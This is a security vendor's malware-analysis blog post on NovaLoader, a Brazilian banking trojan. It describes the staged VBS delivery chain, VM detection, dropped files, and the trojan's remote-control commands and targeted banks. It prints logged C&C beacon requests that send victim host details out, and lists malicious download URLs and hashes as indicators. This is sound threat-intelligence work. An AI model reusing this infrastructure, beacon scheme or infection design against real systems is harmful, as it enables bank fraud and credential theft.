Nehmen Sie an der Zenith Live 2019 teil Jetzt anmelden
Nehmen Sie an der Zenith Live 2019 teil Jetzt anmelden

NovaLoader, yet another Brazilian banking malware family

NovaLoader features a multi-stage payload delivery

By: Abhay Kant Yadav, Atinderpal Singh

Malware

NovaLoader, yet another Brazilian banking malware family

As part of our daily threat tracking activity, ThreatLabZ researchers recently came across an interesting Brazilian banking malware campaign. The malware, NovaLoader, was written in Delphi and made extensive use of Visual Basic Script (VBS) scripting language. Although the final payload was not entirely new and has been discussed by other security researchers, we found that the multi-stage payload delivery was unique.

 

Delivery method

In earlier documented campaigns, the delivery methods for this malware included spam, social engineering, and fake sites for popular software such as Java. The malware operators use a variety of available options to ensure malware delivery and try to avoid detection by security products. They often do so by abusing popular legitimate services like Dropbox, GitHub,  Pastebin, AWS, GitLab, and others, as well as URL shorteners and dynamic DNS services such as No-IP and DynDNS.

NovaLoader is known to use AutoIt, PowerShell, and batch scripts in the infection chain, but this is the first time we have seen it use VBS. In this campaign, it is also using encrypted scripts instead of simply obfuscated ones.

Activity Flowchart

Fig.1: NovaLoader Infection flow

 

Main Dropper

MD5: 4ef89349a52f9fcf9a139736e236217e

The main dropper is very simple; its only purpose is to decrypt the embedded VB script and run the decrypted script.

 

Stage 1 VB script decryption loop

Fig. 2: Stage 1 VB script decryption loop

 

Stage 1 Script

Embedded script before and after decryption:

VB script before and after decryption

Fig. 3: VB script before and after decryption

This VBS file will decrypt a URL (dwosgraumellsa[.]club/cabaco2.txt) to download another encrypted script and run that after decryption.

Download request for  next stage encrypted payloadD

Fig. 4: Download request for the next stage, an encrypted payload

 

Stage 2 Script

Downloaded VB script looks like the following after decryption:

VBS after decryption

Fig. 5: VBS after decryption

The VB script will send a GET request to “http://54.95.36[.]242/contaw.php” , possibly to let the command-and-control (C&C) server know that it is running on the system. After that it will try to detect presence of virtual environment using Windows Management Instrumentation (WMI) queries, as shown below.

VM detection code

Fig. 6: VM detection code

NovaLoader will drop and copy following executable files into the directory C:\\Users\\Public\\:

C:\\Windows\\(system32|SysWOW64)\\rundll32.exe
C:\\Windows\\(system32|SysWOW64)\\Magnification.dll

CnC notification request

Fig. 7: C&C notification request

After that it will download a following files from 32atendimentodwosgraumell[.]club

32atendimentodwosgraumell[.]club/mi5a.php decrypted and saved at C:\Users\Public\{random}4.zip
32atendimentodwosgraumell[.]club/mi5a1.zip saved at C:\Users\Public\{random}1.zip
32atendimentodwosgraumell[.]club/mi5asq.zip saved at C:\Users\Public\{random}sq.zip

Then it will send multiple GET requests to “54.95.36.242/contaw{1-7}.php

Fig. 8: Multiple C&C requests

GET /contaw.php
GET /contaw2.php?w={redacted}BIT-PC_Microsoft%20Windows%207%20Professional%20_True
GET /contaw3.php?w={redacted}BIT-PC
GET /contaw4.php?w={redacted}BIT-PC
GET /contaw5.php?w={redacted}BIT-PC
GET /contaw6.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM
GET /contaw7.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM_CD=414KbCD1=9160Kb_

It will also drop several files into the C:\Users\Public\ directory:

Dropped files

MD5

Comment

DST.exe

51138BEEA3E2C21EC44D0932C71762A8

copied rundll32.exe

I

3DC26D510907EAAC8FDC853D5F378A83

encypted file containing various values like version, extension etc.

I_

A34F1D7ED718934185EC96984E232784

encrypted configuration file

KC

89473D02FEB24CE5BDE8F7A559631351

similar to file named "I"

mwg.dll

F3F571288CDE445881102E385BF3471F

copied magnification.dll

PFPQUN.DST

8C03B522ACB4DDC7F07AB391E79F1601

support dll to decrypt main payload

PFPQUN1.DST

F3D4520313D05C66CEBA8BDA748C0EA9

encrypted main payload

winx86.dll

87F9E5A6318AC1EC5EE05AA94A919D7A

Sqlite dll

Fig. 9: Files dropped by script

And, finally, it will execute the decrypted DLL exported function using the copied rundll32.exe file.

Fig. 10: Executing the stage-3 payload

The stage-3 payload is a DLL file that acts as a loader for the final payload. It is run via rundll32.exe and its purpose is to decrypt and load the final payload.

 

Final payload

The final payload is written in Delphi. It has multiple capabilities including stealing victim's credentials for several Brazilian banks. It monitors the browser window’s title for bank names and if a targeted tab is found, the malware can take control of the system and block the victim from the real bank's page to do its nefarious activities by communicating to its C&C. Its activity is quite similar to the well-known Overlay RAT.

Some of the interesting commands used by the malware include:

Command String

Description

<|SocketMain|>

To stabilize socket connection

<|Info|>

Sends infected OS details

<|PING|>

Checking status of the connection

<|Close|>

Close all connections

<|REQUESTKEYBOARD|>

Sends keystrokes to the active application window

<|MousePos|>

Set mouse position

<|MouseLD|>

Set mouse left button down

<|MouseLU|>

Set mouse left button up

<|MouseRD|>

Set mouse right button up

<|MouseRU|>

Set mouse right button down

<|Desktop|>

Share compromised system desktop

<|gets|>

Check gets in C&C response to check if data is correct reply with <|okok|>

Fig. 11: NovaLoader C&C commands

There were many interesting strings related to the Brazilian banks found in malware:

Strings in malware

Corresponding bank site

caixa

http://www.caixa.gov.br

bancodobrasil

https://www2.bancobrasil.com.br

bbcombr

https://www.bb.com.br/

bradesco

https://banco.bradesco/

santander

https://www.santander.com.br/

bancodaamazonia

https://www.bancoamazonia.com.br/

brbbanknet

https://brbbanknet.brb.com.br/netbanking/

banese

https://www.banese.com.br/

banestes

https://www.banestes.com.br/

bancodoestadodopar

https://www.banpara.b.br/

bancobs2

https://www.bs2.com/

citibankbrasil

https://www.citibank.com.br

bancofibraonline

https://www.bancofibra.com.br/

agibank

https://www.agibank.com.br/

bancoguanabara

http://www.bancoguanabara.com.br/

ccbbrasil

http://www.br.ccb.com

bancoindusval

https://www.bip.b.br/ir

internetbankingbancointer

https://internetbanking.bancointer.com.br/

modalbanking

https://modalbanking.modal.com.br/

bancopan

https://www.bancopan.com.br/

pineonline

https://www.pine.com/

Fig. 12: Some of the targeted bank strings found in the malware
 

Conclusion

The Brazilian actors are among the top contributors of global cybercrime and they are always coming up with new ways to infect their targets using spam, social engineering, and phishing. In this campaign, we have observed them targeting Brazilian financial institutions using malware written in Delphi. The Zscaler ThreatLabZ team is actively tracking and reviewing all malicious payloads to ensure that our customers are protected.

 

IOCs

Md5

60e5f9fe1b778b4dc928f9d4067b470b
4ef89349a52f9fcf9a139736e236217e
100ff8b5eeed3fba85a1f64db319ff40
99471d4f03fb5ac5a409a79100cd9349
cb2ef5d8a227442d0156de82de526b30
a16273279d6fe8fa12f37c57345d42f7
ac4152492e9a2c4ed1ff359ee7e990d1
fdace867e070df4bf3bdb1ed0dbdb51c
4d5d1dfb84ef69f7c47c68e730ec1fb7
6bf65db5511b06749711235566a6b438
c5a573d622750973d90af054a09ab8dd
ef5f2fd7b0262a5aecc32e879890fb40
35803b81efc043691094534662e1351c
34340c9045d665b800fcdb8c265eebec
a71e09796fb9f8527afdfdd29c727787
5a9f779b9cb2b091c9c1eff32b1f9754
a7117788259030538601e8020035867e
cb9f95cec3debc96ddc1773f6c681d8c
a7722ea1ca64fcd7b7ae2d7c86f13013

URLs

185[.]141[.]195[.]5/prt1.txt
185[.]141[.]195[.]81/prt3.txt
185[.]141[.]195[.]74/prt1.txt
dwosgraumellsa[.]club/cabaco2.txt
wn5zweb[.]online/works1.txt
23[.]94[.]243[.]101/vdb1.txt
167[.]114[.]31[.]95/gdo1.txt
167[.]114[.]31[.]93/gdo1.txt




Suggested Blogs